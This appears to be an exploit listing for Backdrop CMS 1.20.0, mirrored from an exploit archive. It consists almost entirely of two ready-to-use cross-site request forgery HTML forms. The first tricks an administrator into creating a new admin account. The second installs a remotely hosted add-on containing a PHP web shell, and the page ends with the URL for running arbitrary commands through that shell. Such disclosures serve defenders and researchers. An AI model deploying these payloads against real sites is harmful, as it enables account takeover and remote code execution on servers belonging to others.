Exploit for Backdrop CMS 1.20.0 Cross Site Request Forgery / Command Execution

Name: Exploit for Backdrop CMS 1.20.0 Cross Site Request Forgery / Command Execution
Rating: 5 (157 reviews)
2021-09-23 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:164260
# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)  
# Exploit Author: V1n1v131r4  
# Date: 2021-09-22  
# Vendor Homepage: https://backdropcms.org/  
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip  
# Version: 1.20.0  
# Tested On: Kali Linux, Ubuntu 20.04  
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers.  
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file.  
  
<html>  
<body>  
<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">  
<input type="text" name="q" value="admin/people/create">  
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">  
<input type="text" name="name" value="hacker">  
<input type="text" name="mail" value="hacker@hacker.com">  
<input type="text" name="notify" value="1">  
<input type="text" name="pass" value="admin">  
<input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">  
<input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">  
<input type="text" name="form_id" value="user_register_form">  
<input type="text" name="status" value="1">  
<input type="text" name="roles[administrator]" value="administrator">  
<input type="text" name="op" value="Create new account">  
<input type="submit" value="Send">  
</form>  
</body>  
</html>  
  
# Step 1  
# Send this page below to the victim  
  
<html>  
<body>  
<form method="POST" action="http://example.com/backdrop/?q=system/ajax">  
<input type="text" name="q" value="system/ajax">  
<input type="text" name="Backdrop.tableDrag.showWeight" value="0">  
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">  
<input type="text" name="bulk" value="">  
<input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">  
<input type="text" name="files[project_upload]" value="">  
<input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">  
<input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">  
<input type="text" name="form_id" value="installer_manager_install_form">  
<input type="text" name="_triggering_element_name" value="op">  
<input type="text" name="_triggering_element_value" value="Install">  
<input type="text" name="ajax_html_ids[]" value="skip-link">  
<input type="text" name="ajax_html_ids[]" value="main-content">  
<input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">  
<input type="text" name="ajax_html_ids[]" value="edit-search-text">  
<input type="text" name="ajax_html_ids[]" value="edit-submit">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-ajax">  
<input type="text" name="ajax_html_ids[]" value="title-link">  
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">  
<input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">  
<input type="text" name="ajax_html_ids[]" value="edit-link">  
<input type="text" name="ajax_html_ids[]" value="admin-bar">  
<input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">  
<input type="text" name="ajax_html_ids[]" value="admin-bar-icon">  
<input type="text" name="ajax_html_ids[]" value="admin-bar-menu">  
<input type="text" name="ajax_html_ids[]" value="admin-bar-extra">  
<input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">  
<input type="text" name="ajax_html_ids[]" value="ui-id-1">  
<input type="text" name="ajax_html_ids[]" value="backdrop-modal">  
<input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">  
<input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">  
<input type="text" name="ajax_html_ids[]" value="edit-bulk">  
<input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">  
<input type="text" name="ajax_html_ids[]" value="edit-project-url">  
<input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">  
<input type="text" name="ajax_html_ids[]" value="edit-project-upload">  
<input type="text" name="ajax_html_ids[]" value="edit-actions">  
<input type="text" name="ajax_html_ids[]" value="edit-submit--2">  
<input type="text" name="ajax_page_state[theme]" value="seven">  
<input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">  
<input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">  
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">  
<input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">  
<input type="submit" value="Send">  
</form>  
</body>  
</html>   
  
Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.